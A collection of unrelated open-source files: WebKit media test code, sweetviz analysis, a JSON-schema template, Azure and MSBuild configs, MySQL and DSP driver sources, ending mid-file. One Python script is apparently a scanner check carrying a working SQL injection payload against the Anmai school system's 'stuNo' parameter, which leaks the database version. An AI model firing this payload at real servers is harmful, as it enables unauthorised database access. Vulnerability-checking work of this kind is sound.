MockMediaSample::flags() const { unsigned flags = None; if (m_box.flags() & MockSampleBox::IsSync) flags |= IsSync; return SampleFlags(flags); } PlatformSample MockMediaSample::platformSample() { PlatformSample sample = { PlatformSample::MockSampleBoxType, { &m_box } }; return sample; } void MockMediaSample::dump(PrintStream& out) const { out.print("{PTS(", presentationTime(), "), DTS(", decodeTime(), "), duration(", duration(), "), flags(", (int)flags(), "), generation(", generation(), ")}"); } class MockMediaDescription final : public MediaDescription { public: static RefPtr<MockMediaDescription> create(const MockTrackBox& box) { return adoptRef(new MockMediaDescription(box)); } virtual ~MockMediaDescription() { } AtomicString codec() const override { return m_box.codec(); } bool isVideo() const override { return m_box.kind() == MockTrackBox::Video; } bool isAudio() const override { return m_box.kind() == MockTrackBox::Audio; } bool isText() const override { return m_box.kind() == MockTrackBox::Text; } protected: MockMediaDescription(const MockTrackBox& box) : m_box(box) { } MockTrackBox m_box; }; RefPtr<MockSourceBufferPrivate> MockSourceBufferPrivate::create(MockMediaSourcePrivate* parent) { return adoptRef(new MockSourceBufferPrivate(parent)); } MockSourceBufferPrivate::MockSourceBufferPrivate(MockMediaSourcePrivate* parent) : m_mediaSource(parent) , m_client(0) { } MockSourceBufferPrivate::~MockSourceBufferPrivate() { } void MockSourceBufferPrivate::setClient(SourceBufferPrivateClient* client) { m_client = client; } void MockSourceBufferPrivate::append(const unsigned char* data, unsigned length) { m_inputBuffer.append(data, length); SourceBufferPrivateClient::AppendResult result = SourceBufferPrivateClient::AppendSucceeded; while (m_inputBuffer.size() && result == SourceBufferPrivateClient::AppendSucceeded) { RefPtr<ArrayBuffer> buffer = ArrayBuffer::create(m_inputBuffer.data(), m_inputBuffer.size()); size_t boxLength = MockBox::peekLength(buffer.get()); if (boxLength > buffer->byteLength()) break; String type = MockBox::peekType(buffer.get()); if (type == MockInitializationBox::type()) { MockInitializationBox initBox = MockInitializationBox(buffer.get()); didReceiveInitializationSegment(initBox); } else if (type == MockSampleBox::type()) { MockSampleBox sampleBox = MockSampleBox(buffer.get()); didReceiveSample(sampleBox); } else result = SourceBufferPrivateClient::ParsingFailed; m_inputBuffer.remove(0, boxLength); } if (m_client) m_client->sourceBufferPrivateAppendComplete(this, result); } void MockSourceBufferPrivate::didReceiveInitializationSegment(const MockInitializationBox& initBox) { if (!m_client) return; SourceBufferPrivateClient::InitializationSegment segment; segment.duration = initBox.duration(); for (auto it = initBox.tracks().begin(); it != initBox.tracks().end(); ++it) { const MockTrackBox& trackBox = *it; if (trackBox.kind() == MockTrackBox::Video) { SourceBufferPrivateClient::InitializationSegment::VideoTrackInformation info; info.track = MockVideoTrackPrivate::create(trackBox); info.description = MockMediaDescription::create(trackBox); segment.videoTracks.append(info); } else if (trackBox.kind() == MockTrackBox::Audio) { SourceBufferPrivateClient::InitializationSegment::AudioTrackInformation info; info.track = MockAudioTrackPrivate::create(trackBox); info.description = MockMediaDescription::create(trackBox); segment.audioTracks.append(info); } else if (trackBox.kind() == MockTrackBox::Text) { SourceBufferPrivateClient::InitializationSegment::TextTrackInformation info; info.track = MockTextTrackPrivate::create(trackBox); info.description = MockMediaDescription::create(trackBox); segment.textTracks.append(info); } } m_client->sourceBufferPrivateDidReceiveInitializationSegment(this, segment); } void MockSourceBufferPrivate::didReceiveSample(const MockSampleBox& sampleBox) { if (!m_client) return; m_client->sourceBufferPrivateDidReceiveSample(this, MockMediaSample::create(sampleBox)); } void MockSourceBufferPrivate::abort() { } void MockSourceBufferPrivate::removedFromMediaSource() { if (m_mediaSource) m_mediaSource->removeSourceBuffer(this); } MediaPlayer::ReadyState MockSourceBufferPrivate::readyState() const { return m_mediaSource ? m_mediaSource->player()->readyState() : MediaPlayer::HaveNothing; } void MockSourceBufferPrivate::setReadyState(MediaPlayer::ReadyState readyState) { if (m_mediaSource) m_mediaSource->player()->setReadyState(readyState); } void MockSourceBufferPrivate::setActive(bool isActive) { if (m_mediaSource) m_mediaSource->sourceBufferPrivateDidChangeActiveState(this, isActive); } void MockSourceBufferPrivate::enqueueSample(PassRefPtr<MediaSample> sample, AtomicString) { if (!m_mediaSource || !sample) return; PlatformSample platformSample = sample->platformSample(); if (platformSample.type != PlatformSample::MockSampleBoxType) return; MockSampleBox* box = platformSample.sample.mockSampleBox; if (!box) return; m_mediaSource->incrementTotalVideoFrames(); if (box->isCorrupted()) m_mediaSource->incrementCorruptedFrames(); if (box->isDropped()) m_mediaSource->incrementDroppedFrames(); if (box->isDelayed()) m_mediaSource->incrementTotalFrameDelayBy(MediaTime(1, 1)); } bool MockSourceBufferPrivate::hasVideo() const { if (!m_client) return false; return m_client->sourceBufferPrivateHasVideo(this); } bool MockSourceBufferPrivate::hasAudio() const { if (!m_client) return false; return m_client->sourceBufferPrivateHasAudio(this); } MediaTime MockSourceBufferPrivate::fastSeekTimeForMediaTime(const MediaTime& time, const MediaTime& negativeThreshold, const MediaTime& positiveThreshold) { if (m_client) return m_client->sourceBufferPrivateFastSeekTimeForMediaTime(this, time, negativeThreshold, positiveThreshold); return time; } void MockSourceBufferPrivate::seekToTime(const MediaTime& time) { if (m_client) m_client->sourceBufferPrivateSeekToTime(this, time); } } #endif
{ "pile_set_name": "Github" }
from sweetviz.config import config from sweetviz.sv_types import NumWithPercent, FeatureType, FeatureToProcess from sweetviz.graph_cat import GraphCat import sweetviz.sv_html as sv_html import sweetviz.utils as utils from sweetviz.sv_types import OTHERS_GROUPED def do_detail_categorical(to_process: FeatureToProcess, updated_dict: dict): updated_dict["detail"] = dict() detail = updated_dict["detail"] # Compute COUNT stats (i.e. below graph) # ---------------------------------------------------------------------------------------------- detail["full_count"] = [] # To get percentages num_values = updated_dict["base_stats"]["num_values"].number if to_process.compare_counts is not None: num_values_compare = updated_dict["compare"]["base_stats"]["num_values"].number category_counts = utils.get_clamped_value_counts(to_process.source_counts["value_counts_without_nan"], \ config["Graphs"].getint("detail_graph_max_categories")) # Iterate through ALL VALUES and get stats total_num_compare = 0 max_abs_value = 0 for item in category_counts.iteritems(): row = dict() row["name"] = item[0] row["count"] = NumWithPercent(item[1], num_values) # Defaults to no comparison or target row["count_compare"] = None row["target_stats"] = None row["target_stats_compare"] = None row["is_total"] = None if to_process.source_target is not None: # HAS TARGET # TODO: OPTIMIZE: CACHE FROM GRAPH? if row["name"] == OTHERS_GROUPED: this_value_target_only = to_process.source_target[ ~to_process.source.isin(category_counts.keys())] else: this_value_target_only = to_process.source_target[to_process.source == row["name"]] if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: # If value is only present in compared if len(this_value_target_only) > 0: count_this_value_target_only = float(this_value_target_only.count()) count_true = this_value_target_only.sum() row["target_stats"] = NumWithPercent(count_true, count_this_value_target_only) else: # None will be correctly interpreted by our display, not nan row["target_stats"] = None elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: # If value is only present in compared if len(this_value_target_only) > 0: row["target_stats"] = NumWithPercent(this_value_target_only.mean(), 1.0) max_abs_value = max(max_abs_value, row["target_stats"].number) else: # None will be correctly interpreted by our display, not nan row["target_stats"] = None if to_process.compare_counts is not None: # HAS COMPARE... if row["name"] in to_process.compare_counts["value_counts_without_nan"].index: # ...and value exists in COMPARE matching = to_process.compare_counts["value_counts_without_nan"][row["name"]] row["count_compare"] = NumWithPercent(matching, num_values_compare) if to_process.compare_target is not None: # TODO: OPTIMIZE: CACHE FROM GRAPH? if row["name"] == OTHERS_GROUPED: this_value_target_only = to_process.compare_target[ ~to_process.compare.isin(category_counts.keys())] else: this_value_target_only = to_process.compare_target[to_process.compare == row["name"]] # HAS COMPARE-TARGET if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: if len(this_value_target_only) > 0: count_this_value_target_only = float(this_value_target_only.count()) count_true = this_value_target_only.sum() row["target_stats_compare"] = NumWithPercent(count_true, count_this_value_target_only) else: # None will be correctly interpreted by our display, not nan row["target_stats_compare"] = None elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: if len(this_value_target_only) > 0: row["target_stats_compare"] = NumWithPercent(this_value_target_only.mean(), 1.0) max_abs_value = max(max_abs_value, row["target_stats_compare"].number) else: # None will be correctly interpreted by our display, not nan row["target_stats_compare"] = None detail["full_count"].append(row) detail["max_range"] = max_abs_value # "ALL" row # ----------------------------------------------- row = dict() row["name"] = "ALL" row["count"] = NumWithPercent(num_values, num_values) # Defaults to no comparison or target row["count_compare"] = None row["target_stats"] = None row["target_stats_compare"] = None row["is_total"] = True if to_process.source_target is not None: # HAS TARGET if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: # TODO: OPTIMIZE: CACHE FROM GRAPH? count_this_value_target_only = float(to_process.source_target.count()) count_true = to_process.source_target.sum() row["target_stats"] = NumWithPercent(count_true, count_this_value_target_only) elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: # TODO: OPTIMIZE: CACHE FROM GRAPH? row["target_stats"] = NumWithPercent(to_process.source_target.mean(), 1.0) if to_process.compare_counts is not None: row["count_compare"] = NumWithPercent(num_values_compare, num_values_compare) if to_process.compare_target is not None: # HAS COMPARE-TARGET if to_process.predetermined_type_target == FeatureType.TYPE_BOOL: # TODO: OPTIMIZE: CACHE FROM GRAPH? count_this_value_target_only = float(to_process.compare_target.count()) count_true = to_process.compare_target.sum() row["target_stats_compare"] = NumWithPercent(count_true, count_this_value_target_only) elif to_process.predetermined_type_target == FeatureType.TYPE_NUM: # TODO: OPTIMIZE: CACHE FROM GRAPH? row["target_stats_compare"] = NumWithPercent(to_process.compare_target.mean(), 1.0) detail["full_count"].append(row) return def analyze(to_process: FeatureToProcess, feature_dict: dict): compare_dict = feature_dict.get("compare") feature_dict["stats"] = dict() if compare_dict: compare_dict["stats"] = dict() do_detail_categorical(to_process, feature_dict) feature_dict["minigraph"] = GraphCat("mini", to_process) feature_dict["detail_graphs"] = list() feature_dict["detail_graphs"].append(GraphCat("detail", to_process)) if to_process.is_target(): feature_dict["html_summary"] = sv_html.generate_html_summary_target_cat(feature_dict, compare_dict) else: feature_dict["html_summary"] = sv_html.generate_html_summary_cat(feature_dict, compare_dict) return
{ "pile_set_name": "Github" }
{{# def.definitions }} {{# def.errors }} {{# def.setupKeyword }} {{# def.setupNextLevel }} var {{=$errs}} = errors; var prevValid{{=$lvl}} = false; var {{=$valid}} = false; {{ var $currentBaseId = $it.baseId; }} {{# def.setCompositeRule }} {{~ $schema:$sch:$i }} {{? {{# def.nonEmptySchema:$sch }} }} {{ $it.schema = $sch; $it.schemaPath = $schemaPath + '[' + $i + ']'; $it.errSchemaPath = $errSchemaPath + '/' + $i; }} {{# def.insertSubschemaCode }} {{??}} var {{=$nextValid}} = true; {{?}} {{? $i }} if ({{=$nextValid}} && prevValid{{=$lvl}}) {{=$valid}} = false; else { {{ $closingBraces += '}'; }} {{?}} if ({{=$nextValid}}) {{=$valid}} = prevValid{{=$lvl}} = true; {{~}} {{# def.resetCompositeRule }} {{= $closingBraces }} if (!{{=$valid}}) { {{# def.extraError:'oneOf' }} } else { {{# def.resetErrors }} {{? it.opts.allErrors }} } {{?}}
{ "pile_set_name": "Github" }
package node type Node struct { Id int } type NodeOrderedSet []Node
{ "pile_set_name": "Github" }
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' name: 安脉grghjl.aspx 参数stuNo注入 referer: http://www.wooyun.org/bugs/wooyun-2010-0102420 author: Lucifer description: 文件/anmai/Edis/DiathesisAppraise/grghjl.aspx中,参数stuNo存在SQL注入。 ''' import sys import requests class anmai_grghjl_stuNo_sqli_BaseVerify: def __init__(self, url): self.url = url def run(self): headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } payload = "/anmai/Edis/DiathesisAppraise/grghjl.aspx?stuNo=1%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIon)>0--" vulnurl = self.url + payload try: req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) if r"BBBMicrosoft" in req.text: return "[+]存在安脉grghjl.aspx 参数stuNo注入漏洞...(高危)\tpayload: "+vulnurl except: return "[-]connect timeout" if __name__ == "__main__": testVuln = anmai_grghjl_stuNo_sqli_BaseVerify(sys.argv[1]) testVuln.run()
{ "pile_set_name": "Github" }
{ "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "streamingJobName": { "type": "string", "defaultValue": "streamingjob" }, "eventHubNamespace": { "type": "string" }, "eventHubKey": { "type": "securestring" }, "eventHubName": { "type": "string" }, "eventHubConsumerGroupName": { "type": "string" }, "streamingUnits": { "type": "int", "defaultValue": 3 }, "cosmosdbAccountId": { "type": "string" }, "cosmosdbAccountKey": { "type": "securestring" }, "cosmosdbDatabase": { "type": "string", "defaultValue": "streaming" }, "cosmosdbCollectionName": { "type": "string", "defaultValue": "rawdata" }, "cosmosdbPartitionKey": { "type": "string", "defaultValue": "deviceId" }, "cosmosdbDocumentId": { "type": "string", "defaultValue": "eventId" } }, "resources": [ { "apiVersion": "2017-04-01-preview", "name": "[parameters('streamingJobName')]", "location": "[resourceGroup().location]", "type": "Microsoft.StreamAnalytics/StreamingJobs", "identity": { "type": "systemAssigned" }, "properties": { "sku": { "name": "standard" }, "eventsOutOfOrderPolicy": "drop", "eventsOutOfOrderMaxDelayInSeconds": 10, "compatibilityLevel": "1.2", "outputStartMode": "JobStartTime", "inputs": [ { "name": "inputEventHub", "properties": { "type": "stream", "serialization": { "type": "JSON", "properties": { "encoding": "UTF8" } }, "datasource": { "type": "Microsoft.ServiceBus/EventHub", "properties": { "serviceBusNamespace": "[parameters('eventHubNamespace')]", "sharedAccessPolicyName": "Listen", "sharedAccessPolicyKey": "[parameters('eventHubKey')]", "eventHubName": "[parameters('eventHubName')]", "consumerGroupName": "[parameters('eventHubConsumerGroupName')]" } } } } ], "transformation": { "name": "ProcessSampleData", "properties": { "streamingUnits": "[int(parameters('streamingUnits'))]", "query": "select deviceId, deviceSequenceNumber, type, complexData, value, eventId, PartitionId, createdAt, EventEnqueuedUtcTime AS enqueuedAt, EventProcessedUtcTime AS processedAt, UDF.GetCurrentDateTime('') AS processedAt2 from inputEventHub partition by PartitionId" } }, "functions": [{ "name": "GetCurrentDateTime", "type": "Microsoft.StreamAnalytics/streamingjobs/functions", "properties": { "type": "Scalar", "properties": { "inputs": [{ "dataType": "any", "isConfigurationParameter": null }], "output": { "dataType": "any" }, "binding": { "type": "Microsoft.StreamAnalytics/JavascriptUdf", "properties": { "script": "// Sample UDF which returns current timestamp.\nfunction main(s) {\n return new Date().toISOString();\n}" } } }, "etag": "cc766b0b-3746-4c3b-bb8e-d9366a6c352f" } }], "outputs": [ { "name": "output", "properties": { "serialization": { "type": "JSON", "properties": { "encoding": "UTF8" } }, "datasource": { "type": "Microsoft.Storage/DocumentDB", "properties": { "accountId": "[parameters('cosmosdbAccountId')]", "accountKey": "[parameters('cosmosdbAccountKey')]", "database": "[parameters('cosmosdbDatabase')]", "collectionNamePattern": "[parameters('cosmosdbCollectionName')]", "partitionKey": "[parameters('cosmosdbPartitionKey')]", "documentId": "[parameters('cosmosdbDocumentId')]" } } } } ] } } ] }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <ItemGroup> <ClInclude Include="..\..\final_tiletrace.hpp" /> <ClInclude Include="..\..\final_platform_layer.h" /> </ItemGroup> <ItemGroup> <ClCompile Include="ftt_tiletracingdemo.cpp" /> </ItemGroup> </Project>
{ "pile_set_name": "Github" }
/* * Copyright (c) 2018, 2019, Oracle and/or its affiliates. All rights reserved. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License, version 2.0, * as published by the Free Software Foundation. * * This program is also distributed with certain software (including * but not limited to OpenSSL) that is licensed under separate terms, * as designated in a particular file or component or in included license * documentation. The authors of MySQL hereby grant you an additional * permission to link the program and your derivative works with the * separately licensed software that they have included with MySQL. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License, version 2.0, for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #include "plugin/x/src/helper/multithread/cond.h" #include "my_systime.h" namespace xpl { Cond::Cond(PSI_cond_key key) { mysql_cond_init(key, &m_cond); } Cond::~Cond() { mysql_cond_destroy(&m_cond); } void Cond::wait(Mutex &mutex) { mysql_cond_wait(&m_cond, &mutex.m_mutex); } int Cond::timed_wait(Mutex &mutex, unsigned long long nanoseconds) { timespec ts; set_timespec_nsec(&ts, nanoseconds); return mysql_cond_timedwait(&m_cond, &mutex.m_mutex, &ts); } void Cond::signal() { mysql_cond_signal(&m_cond); } void Cond::signal(Mutex &mutex) { MUTEX_LOCK(lock, mutex); signal(); } void Cond::broadcast() { mysql_cond_broadcast(&m_cond); } void Cond::broadcast(Mutex &mutex) { MUTEX_LOCK(lock, mutex); broadcast(); } } // namespace xpl
{ "pile_set_name": "Github" }
/* * chnl_sm.c * * DSP-BIOS Bridge driver support functions for TI OMAP processors. * * Implements upper edge functions for Bridge driver channel module. * * Copyright (C) 2005-2006 Texas Instruments, Inc. * * This package is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * THIS PACKAGE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ /* * The lower edge functions must be implemented by the Bridge driver * writer, and are declared in chnl_sm.h. * * Care is taken in this code to prevent simulataneous access to channel * queues from * 1. Threads. * 2. io_dpc(), scheduled from the io_isr() as an event. * * This is done primarily by: * - Semaphores. * - state flags in the channel object; and * - ensuring the IO_Dispatch() routine, which is called from both * CHNL_AddIOReq() and the DPC(if implemented), is not re-entered. * * Channel Invariant: * There is an important invariant condition which must be maintained per * channel outside of bridge_chnl_get_ioc() and IO_Dispatch(), violation of * which may cause timeouts and/or failure offunction sync_wait_on_event. * This invariant condition is: * * LST_Empty(pchnl->pio_completions) ==> pchnl->sync_event is reset * and * !LST_Empty(pchnl->pio_completions) ==> pchnl->sync_event is set. */ #include <linux/types.h> /* ----------------------------------- OS */ #include <dspbridge/host_os.h> /* ----------------------------------- DSP/BIOS Bridge */ #include <dspbridge/dbdefs.h> /* ----------------------------------- Trace & Debug */ #include <dspbridge/dbc.h> /* ----------------------------------- OS Adaptation Layer */ #include <dspbridge/cfg.h> #include <dspbridge/sync.h> /* ----------------------------------- Bridge Driver */ #include <dspbridge/dspdefs.h> #include <dspbridge/dspchnl.h> #include "_tiomap.h" /* ----------------------------------- Platform Manager */ #include <dspbridge/dev.h> /* ----------------------------------- Others */ #include <dspbridge/io_sm.h> /* ----------------------------------- Define for This */ #define USERMODE_ADDR PAGE_OFFSET #define MAILBOX_IRQ INT_MAIL_MPU_IRQ /* ----------------------------------- Function Prototypes */ static struct lst_list *create_chirp_list(u32 chirps); static void free_chirp_list(struct lst_list *chirp_list); static struct chnl_irp *make_new_chirp(void); static int search_free_channel(struct chnl_mgr *chnl_mgr_obj, u32 *chnl); /* * ======== bridge_chnl_add_io_req ======== * Enqueue an I/O request for data transfer on a channel to the DSP. * The direction (mode) is specified in the channel object. Note the DSP * address is specified for channels opened in direct I/O mode. */ int bridge_chnl_add_io_req(struct chnl_object *chnl_obj, void *host_buf, u32 byte_size, u32 buf_size, u32 dw_dsp_addr, u32 dw_arg) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; struct chnl_irp *chnl_packet_obj = NULL; struct bridge_dev_context *dev_ctxt; struct dev_object *dev_obj; u8 dw_state; bool is_eos; struct chnl_mgr *chnl_mgr_obj = pchnl->chnl_mgr_obj; u8 *host_sys_buf = NULL; bool sched_dpc = false; u16 mb_val = 0; is_eos = (byte_size == 0); /* Validate args */ if (!host_buf || !pchnl) { status = -EFAULT; } else if (is_eos && CHNL_IS_INPUT(pchnl->chnl_mode)) { status = -EPERM; } else { /* * Check the channel state: only queue chirp if channel state * allows it. */ dw_state = pchnl->dw_state; if (dw_state != CHNL_STATEREADY) { if (dw_state & CHNL_STATECANCEL) status = -ECANCELED; else if ((dw_state & CHNL_STATEEOS) && CHNL_IS_OUTPUT(pchnl->chnl_mode)) status = -EPIPE; else /* No other possible states left */ DBC_ASSERT(0); } } dev_obj = dev_get_first(); dev_get_bridge_context(dev_obj, &dev_ctxt); if (!dev_ctxt) status = -EFAULT; if (status) goto func_end; if (pchnl->chnl_type == CHNL_PCPY && pchnl->chnl_id > 1 && host_buf) { if (!(host_buf < (void *)USERMODE_ADDR)) { host_sys_buf = host_buf; goto func_cont; } /* if addr in user mode, then copy to kernel space */ host_sys_buf = kmalloc(buf_size, GFP_KERNEL); if (host_sys_buf == NULL) { status = -ENOMEM; goto func_end; } if (CHNL_IS_OUTPUT(pchnl->chnl_mode)) { status = copy_from_user(host_sys_buf, host_buf, buf_size); if (status) { kfree(host_sys_buf); host_sys_buf = NULL; status = -EFAULT; goto func_end; } } } func_cont: /* Mailbox IRQ is disabled to avoid race condition with DMA/ZCPY * channels. DPCCS is held to avoid race conditions with PCPY channels. * If DPC is scheduled in process context (iosm_schedule) and any * non-mailbox interrupt occurs, that DPC will run and break CS. Hence * we disable ALL DPCs. We will try to disable ONLY IO DPC later. */ spin_lock_bh(&chnl_mgr_obj->chnl_mgr_lock); omap_mbox_disable_irq(dev_ctxt->mbox, IRQ_RX); if (pchnl->chnl_type == CHNL_PCPY) { /* This is a processor-copy channel. */ if (!status && CHNL_IS_OUTPUT(pchnl->chnl_mode)) { /* Check buffer size on output channels for fit. */ if (byte_size > io_buf_size(pchnl->chnl_mgr_obj->hio_mgr)) status = -EINVAL; } } if (!status) { /* Get a free chirp: */ chnl_packet_obj = (struct chnl_irp *)lst_get_head(pchnl->free_packets_list); if (chnl_packet_obj == NULL) status = -EIO; } if (!status) { /* Enqueue the chirp on the chnl's IORequest queue: */ chnl_packet_obj->host_user_buf = chnl_packet_obj->host_sys_buf = host_buf; if (pchnl->chnl_type == CHNL_PCPY && pchnl->chnl_id > 1) chnl_packet_obj->host_sys_buf = host_sys_buf; /* * Note: for dma chans dw_dsp_addr contains dsp address * of SM buffer. */ DBC_ASSERT(chnl_mgr_obj->word_size != 0); /* DSP address */ chnl_packet_obj->dsp_tx_addr = dw_dsp_addr / chnl_mgr_obj->word_size; chnl_packet_obj->byte_size = byte_size; chnl_packet_obj->buf_size = buf_size; /* Only valid for output channel */ chnl_packet_obj->dw_arg = dw_arg; chnl_packet_obj->status = (is_eos ? CHNL_IOCSTATEOS : CHNL_IOCSTATCOMPLETE); lst_put_tail(pchnl->pio_requests, (struct list_head *)chnl_packet_obj); pchnl->cio_reqs++; DBC_ASSERT(pchnl->cio_reqs <= pchnl->chnl_packets); /* * If end of stream, update the channel state to prevent * more IOR's. */ if (is_eos) pchnl->dw_state |= CHNL_STATEEOS; /* Legacy DSM Processor-Copy */ DBC_ASSERT(pchnl->chnl_type == CHNL_PCPY); /* Request IO from the DSP */ io_request_chnl(chnl_mgr_obj->hio_mgr, pchnl, (CHNL_IS_INPUT(pchnl->chnl_mode) ? IO_INPUT : IO_OUTPUT), &mb_val); sched_dpc = true; } omap_mbox_enable_irq(dev_ctxt->mbox, IRQ_RX); spin_unlock_bh(&chnl_mgr_obj->chnl_mgr_lock); if (mb_val != 0) sm_interrupt_dsp(dev_ctxt, mb_val); /* Schedule a DPC, to do the actual data transfer */ if (sched_dpc) iosm_schedule(chnl_mgr_obj->hio_mgr); func_end: return status; } /* * ======== bridge_chnl_cancel_io ======== * Return all I/O requests to the client which have not yet been * transferred. The channel's I/O completion object is * signalled, and all the I/O requests are queued as IOC's, with the * status field set to CHNL_IOCSTATCANCEL. * This call is typically used in abort situations, and is a prelude to * chnl_close(); */ int bridge_chnl_cancel_io(struct chnl_object *chnl_obj) { int status = 0; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; u32 chnl_id = -1; s8 chnl_mode; struct chnl_irp *chnl_packet_obj; struct chnl_mgr *chnl_mgr_obj = NULL; /* Check args: */ if (pchnl && pchnl->chnl_mgr_obj) { chnl_id = pchnl->chnl_id; chnl_mode = pchnl->chnl_mode; chnl_mgr_obj = pchnl->chnl_mgr_obj; } else { status = -EFAULT; } if (status) goto func_end; /* Mark this channel as cancelled, to prevent further IORequests or * IORequests or dispatching. */ spin_lock_bh(&chnl_mgr_obj->chnl_mgr_lock); pchnl->dw_state |= CHNL_STATECANCEL; if (LST_IS_EMPTY(pchnl->pio_requests)) goto func_cont; if (pchnl->chnl_type == CHNL_PCPY) { /* Indicate we have no more buffers available for transfer: */ if (CHNL_IS_INPUT(pchnl->chnl_mode)) { io_cancel_chnl(chnl_mgr_obj->hio_mgr, chnl_id); } else { /* Record that we no longer have output buffers * available: */ chnl_mgr_obj->dw_output_mask &= ~(1 << chnl_id); } } /* Move all IOR's to IOC queue: */ while (!LST_IS_EMPTY(pchnl->pio_requests)) { chnl_packet_obj = (struct chnl_irp *)lst_get_head(pchnl->pio_requests); if (chnl_packet_obj) { chnl_packet_obj->byte_size = 0; chnl_packet_obj->status |= CHNL_IOCSTATCANCEL; lst_put_tail(pchnl->pio_completions, (struct list_head *)chnl_packet_obj); pchnl->cio_cs++; pchnl->cio_reqs--; DBC_ASSERT(pchnl->cio_reqs >= 0); } } func_cont: spin_unlock_bh(&chnl_mgr_obj->chnl_mgr_lock); func_end: return status; } /* * ======== bridge_chnl_close ======== * Purpose: * Ensures all pending I/O on this channel is cancelled, discards all * queued I/O completion notifications, then frees the resources allocated * for this channel, and makes the corresponding logical channel id * available for subsequent use. */ int bridge_chnl_close(struct chnl_object *chnl_obj) { int status; struct chnl_object *pchnl = (struct chnl_object *)chnl_obj; /* Check args: */ if (!pchnl) { status = -EFAULT; goto func_cont; } { /* Cancel IO: this ensures no further IO requests or * notifications. */ status = bridge_chnl_cancel_io(chnl_obj); } func_cont: if (!status) { /* Assert I/O on this channel is now cancelled: Protects * from io_dpc. */ DBC_ASSERT((pchnl->dw_state & CHNL_STATECANCEL)); /* Invalidate channel object: Protects from * CHNL_GetIOCompletion(). */ /* Free the slot in the channel manager: */ pchnl->chnl_mgr_obj->ap_channel[pchnl->chnl_id] = NULL; spin_lock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); pchnl->chnl_mgr_obj->open_channels -= 1; spin_unlock_bh(&pchnl->chnl_mgr_obj->chnl_mgr_lock); if (pchnl->ntfy_obj) { ntfy_delete(pchnl->ntfy_obj); kfree(pchnl->ntfy_obj); pchnl->ntfy_obj = NULL; } /* Reset channel event: (NOTE: user_event freed in user * context.). */ if (pchnl->sync_event) { sync_reset_event(pchnl->sync_event); kfree(pchnl->sync_event); pchnl->sync_event = NULL; } /* Free I/O request and I/O completion queues: */ if (pchnl->pio_completions) { free_chirp_list(pchnl->pio_completions); pchnl->pio_completions = NULL; pchnl->cio_cs = 0; } if (pchnl->pio_requests) { free_chirp_list(pchnl->pio_requests); pchnl->pio_requests = NULL; pchnl->cio_reqs = 0; } if (pchnl->free_packets_list) { free_chirp_list(pchnl->free_packets_list); pchnl->free_packets_list = NULL; } /* Release channel object. */ kfree(pchnl); pchnl = NULL; } DBC_ENSURE(status || !pchnl); return status; } /* * ======== bridge_chnl_create ======== * Create a channel manager object, responsible for opening new channels * and closing old ones for a given board. */ int bridge_chnl_create(struct chnl_mgr **channel_mgr, struct dev_object *hdev_obj, const struct chnl_mgrattrs *mgr_attrts) { int status = 0; struct chnl_mgr *chnl_mgr_obj = NULL; u8 max_channels; /* Check DBC requirements: */ DBC_REQUIRE(channel_mgr != NULL); DBC_REQUIRE(mgr_attrts != NULL); DBC_REQUIRE(mgr_attrts->max_channels > 0); DBC_REQUIRE(mgr_attrts->max_channels <= CHNL_MAXCHANNELS); DBC_REQUIRE(mgr_attrts->word_size != 0); /* Allocate channel manager object */ chnl_mgr_obj = kzalloc(sizeof(struct chnl_mgr), GFP_KERNEL); if (chnl_mgr_obj) { /* * The max_channels attr must equal the # of supported chnls for * each transport(# chnls for PCPY = DDMA = ZCPY): i.e. * mgr_attrts->max_channels = CHNL_MAXCHANNELS = * DDMA_MAXDDMACHNLS = DDMA_MAXZCPYCHNLS. */ DBC_ASSERT(mgr_attrts->max_channels == CHNL_MAXCHANNELS); max_channels = CHNL_MAXCHANNELS + CHNL_MAXCHANNELS * CHNL_PCPY; /* Create array of channels */ chnl_mgr_obj->ap_channel = kzalloc(sizeof(struct chnl_object *) * max_channels, GFP_KERNEL); if (chnl_mgr_obj->ap_channel) { /* Initialize chnl_mgr object */ chnl_mgr_obj->dw_type = CHNL_TYPESM; chnl_mgr_obj->word_size = mgr_attrts->word_size; /* Total # chnls supported */ chnl_mgr_obj->max_channels = max_channels; chnl_mgr_obj->open_channels = 0; chnl_mgr_obj->dw_output_mask = 0; chnl_mgr_obj->dw_last_output = 0; chnl_mgr_obj->hdev_obj = hdev_obj; spin_lock_init(&chnl_mgr_obj->chnl_mgr_lock); } else { status = -ENOMEM; } } else { status = -ENOMEM; } if (status) { bridge_chnl_destroy(chnl_mgr_obj); *channel_mgr = NULL; } else { /* Return channel manager object to caller... */ *channel_mgr = chnl_mgr_obj; } return status; } /* * ======== bridge_chnl_destroy ======== * Purpose: * Close all open channels, and destroy the channel manager. */ int bridge_chnl_destroy(struct chnl_mgr *hchnl_mgr) { int status = 0; struct chnl_mgr 